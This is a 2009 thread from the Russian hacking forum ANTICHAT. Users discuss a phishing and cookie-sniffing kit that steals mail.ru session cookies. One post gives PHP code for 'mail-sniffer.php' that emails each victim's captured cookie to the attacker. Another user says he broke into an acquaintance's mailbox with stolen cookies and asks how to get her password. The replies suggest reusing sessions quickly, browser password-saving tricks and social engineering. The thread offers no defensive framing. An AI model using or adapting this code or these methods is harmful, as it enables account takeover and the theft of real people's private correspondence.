ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.01.2009, 17:25
|
|
Познающий
Регистрация: 12.12.2008
Сообщений: 38
Провел на форуме:
277038
Репутация:
7
|
|
Сообщение от pavlik74
С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???
Ты наверно забыл удалить все остальные куки от mail.ru, у меня всё работает. Это насчет первого. А насчет другого отчета - ПОБЕДА!!!
Ставь + Ponchick'у!
Только 1 '-' в том, что жертва обязана обязательно открыть фото прямо из браузера 
Последний раз редактировалось AntikasS; 15.01.2009 в 20:48..
|
|
|
20.01.2009, 17:39
|
|
Познающий
Регистрация: 14.05.2006
Сообщений: 68
Провел на форуме:
611329
Репутация:
11
|
|
хех, после видео допёрло как работает данный фейк))) гг)
Хм, а ваще зачётная вещь!
Только пашед на ИЕ, в опере не кушает + письмо не удаляется...
--------------------
прошёл тест на знакомой, на фейк не повелась, но через куки вошёл в её мыло... вопрос терь в другом, сменить пасс или изменить данные для восстановления низя, нужен пасс... как его раздобыть?
возможно ли методом "сохранить пароль" фишкой оперы, а потом из файлов оперы вытянуть его? прога у меня есть... только не могу потестить, я отключил запоминалку паролей для мыла.ру (((
Последний раз редактировалось Пётр; 20.01.2009 в 21:30..
|
|
|
|
22.01.2009, 16:38
|
|
Познающий
Регистрация: 05.09.2007
Сообщений: 39
Провел на форуме:
688176
Репутация:
17
|
|
to Ponchik , спасибо с меня ++ ))
А возможно сделать что-б работала тема и на мозилу? а то просит скачать сцуко (
|
|
|
|
22.01.2009, 16:48
|
|
Познающий
Регистрация: 14.05.2006
Сообщений: 68
Провел на форуме:
611329
Репутация:
11
|
|
добавил "оповещение на мыло", когда жертва прошла сниффер, на мыло придут куки... каму над:
в mail-sniffer.php, в куске работы снифера (до "}else{") вставляем код и меняем мыла на свои:
Код:
$from = "user@mail.ru"; // от кого письмо
$to = "user@mail.ru"; // кому присылаем данные
$subj = " Куки"; // тема письма
$body = " Cookie: $cookie"; // тело письма
$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit";
$from=convert_cyr_string($from,"w","k");
$to=convert_cyr_string($to,"w","k");
$subj=convert_cyr_string($subj,"w","k");
$body=convert_cyr_string($body,"w","k");
mail($to,$subj,$body,$from);
Последний раз редактировалось Пётр; 22.01.2009 в 16:53..
|
|
|
|
23.01.2009, 22:03
|
|
Участник форума
Регистрация: 30.11.2008
Сообщений: 131
Провел на форуме:
8786473
Репутация:
165
|
|
что за ерунда может быть, обычно нормальные куки, все заходит под ними, а щас какаято ерунда:
Mpop=123279321:0654495076630d6419050219a1d00051c00 074f6a5d5e465e010d061b03077a1f5b445a52416e46584714 5e5b535b4f174345:xxxxxx@inbox.ru:-;
и не заходит под ними.. :/ меня смущает минус в конце.. в чем дело? |
|
|
|
23.01.2009, 22:41
|
|
Познающий
Регистрация: 14.05.2006
Сообщений: 68
Провел на форуме:
611329
Репутация:
11
|
|
возможно в минусе дело... никогда минуса не видел, хз
|
|
|
|
24.01.2009, 00:53
|
|
Познающий
Регистрация: 14.05.2006
Сообщений: 68
Провел на форуме:
611329
Репутация:
11
|
|
вот вопрос тоже на счёт куков... в строке с Mpop есть следующее:
где можно расшифровать город? гуглил, ничего не нашёл... |
|
|
|
24.01.2009, 01:11
|
|
Познающий
Регистрация: 12.12.2008
Сообщений: 38
Провел на форуме:
277038
Репутация:
7
|
|
Итак, может я и новичок, но последнюю неделю я в этом деле очень поднялся.
Сообщение от Пётр
возможно в минусе дело... никогда минуса не видел, хз
C минусом мне тоже приходило, все работает. Другое дело, что вам приходит не зашифрованный пароль, а некий хеш сессии. А она не долговечна (У mail.ru около часа). Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь. Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках, иначе самому надо размещать и настраивать sendmail а это не приведи господь...
Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов. |
|
|
|
24.01.2009, 01:46
|
|
Познающий
Регистрация: 14.05.2006
Сообщений: 68
Провел на форуме:
611329
Репутация:
11
|
|
Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках
ну эт да, я на платнике сижу (ресселер), пока живой))
Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь
а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)
ща например весь день захожу на мыло под куками, а вот пасс не наю =\
Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.
своим оповещение доволен... а вот на счёт логов... приходиться сразу лезть через ftp и смареть... хорошо бы на сам деле сделать удобный просмотр!
|
|
|
|
24.01.2009, 02:24
|
|
Познающий
Регистрация: 12.12.2008
Сообщений: 38
Провел на форуме:
277038
Репутация:
7
|
|
а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)
Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д.
А про мой скрипт - к 3 часам ночи допишу)))
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
